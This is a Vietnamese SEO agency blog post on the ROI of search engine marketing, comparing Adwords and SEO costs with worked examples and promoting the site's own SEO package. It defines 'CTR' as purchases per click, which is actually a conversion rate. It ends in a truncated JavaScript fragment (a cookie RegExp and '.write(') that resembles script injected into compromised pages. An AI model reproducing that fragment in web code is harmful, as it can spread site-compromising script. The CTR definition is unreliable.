Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > ROI của SEM – Search Engine Marketing

ROI của SEM – Search Engine Marketing

SEM – Search Engine Marketing bao gồm 2 hoạt động chính là SEO và PPC. SEO là quá trình đưa website lên top Google, PPC – Google Adwords là trả tiền cho Google để quảng cáo hiện khi người dùng tìm kiếm một số từ khóa nhất định. Nếu xét trên quan điểm của người kinh doanh, SEM là hoạt động quảng bá trên kênh Google, mà đã là đầu tư thì phải xét đến ROI – tỉ lệ hoàn vốn đầu tư.

SEM thu hút được khách hàng như thế nào

Khách hàng có 2 loại: khách hàng chủ độngkhách hàng bị động. Khách hàng chủ động là những người đang có nhu cầu mua hàng, khách hàng bị động là khách hàng chưa có nhu cầu (hay nói chính xác hơn là có nhu cầu tiềm ẩn) nhưng cũng có thể mua nếu sản phẩm đó hấp dẫn. Tất nhiên, khách hàng chủ động sẽ có khả năng mua hàng cao hơn so với khách hàng bị động trong khi hầu hết các loại quảng cáo hiện nay đều quảng cáo tới đối tượng khách hàng bị động, họ có thể chọn kênh quảng bá tương đối chính xác nhưng vẫn không thể quảng cáo tới khách hàng chủ động hoàn toàn. Ví dụ, tôi bán một loại thuốc gì đó và quảng cáo ở mục sức khỏe của các báo điện tử, trong những người đọc tin sẽ có những người bị bệnh mà loại thuốc của tôi chữa được, có người lại bị bệnh khác nên số tiền tôi bỏ ra sẽ mất một số phần trăm hao phí nhất định.

Với xu hướng “cái gì không biết thì tra Google” hiện nay, người dùng chủ động sẽ tìm trên Google sản phẩm họ muốn mua. Chính vì thế, SEM là kênh thu hút dược khách hàng chủ động.

ROI của quảng cáo Google Adwords

lợi nhuận seo

Đầu tiên, bạn hãy tính chi phí trên đầu sản phẩm: cộng tất cả chi phí (vốn, thuê cửa hàng, nhân viên, điện nước các kiểu) và chia theo đầu sản phẩm. Ví dụ bạn đang bán một chiếc điện thoại trị giá 19 triệu đồng, chi phí cho chiếc điện thoại là 15 triệu đồng, như vậy lợi nhuận của bạn là 4 triệu đồng cho mỗi chiếc điện thoại.

Tuy nhiên, với thị trường cạnh tranh này càng cao ngày nay, bạn phải hi sinh một phần lợi nhuận để quảng cáo thì mới có thể bán được hàng.

ctr seo

CTR – Click Through Rate ở đây là tỉ lệ mua hàng trên số lượng click. Muốn tăng CTR cần rất nhiều yếu tố như website đẹp, các yếu tố làm khách hàng tin tưởng và mua hàng.  Giả sử 100 click vào website thì có 5 người mua điện thoại của bạn, như vậy CTR là 5%.

giá tiền mỗi click tối đa

Như vậy, giá tiền cho mỗi click tối đa sẽ là lợi nhuận tối đa nhân với CTR. Với ví dụ hiện tại, giá tiền cho mỗi click tối đa là: 4.000.000đ x 5% = 200.000 đ. Nhưng trên thực tế, bạn chỉ phải trả khoảng 1.000đ – 10.000đ cho mỗi click trên Google với dịch vụ Google Adwords, tương đương chi phí 20.000đ – 200.000đ cho mỗi khách hàng trị giá 4.000.000đ.

ROI của SEO – Search Engine Optimization

ROI của SEO cũng giống như Google Adwords vậy, bạn phải dự đoán được số click khi website đã lên top, số tiền chi ra cho đến khi thu được kết quả là bao nhiêu, sau đó số tiền duy trì là bao nhiêu, chia ra trong một chu kỳ thời gian thì giá cho mỗi click của SEO là bao nhiêu.

Ví dụ: trong 4 tháng bạn SEO gói Basic của Pridio, tổng giá trị là 20.000.000đ, tổng lượt tìm kiếm của 12 từ khóa là 50000/ tháng, số click vào website khiêm tốn khoảng 10000/tháng, tương đương 333 click/ ngày. Như vậy, sau 4 tháng đẩy bạn sẽ nhận được hiệu quả của SEO trong 1 tháng, tương đương 2000đ/ click. Trong giai đoạn duy trì SEO, bạn chỉ phải đầu tư đầu tư 3.000.000đ mỗi tháng, thu được 10000 click, tương đương 300đ/ click.

Đến đây, chắc bạn cũng đã hình dung được phần nào hiệu quả của SEM, SEO dưới góc độ của một nhà đầu tư. Bài viết này sẽ dừng ở mức tổng quát và có thể mở rộng sang một số chủ đề sâu hơn: ROI của quảng cáo Google Adwords, ROI của SEO, làm thế nào tăng ROI khi đã lôi được người dùng vào website,…

Chúc các bạn một năm Quý Tỵ vạn sự như ý, an khang thịnh vượng, làm ăn phát tài phát lộc. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘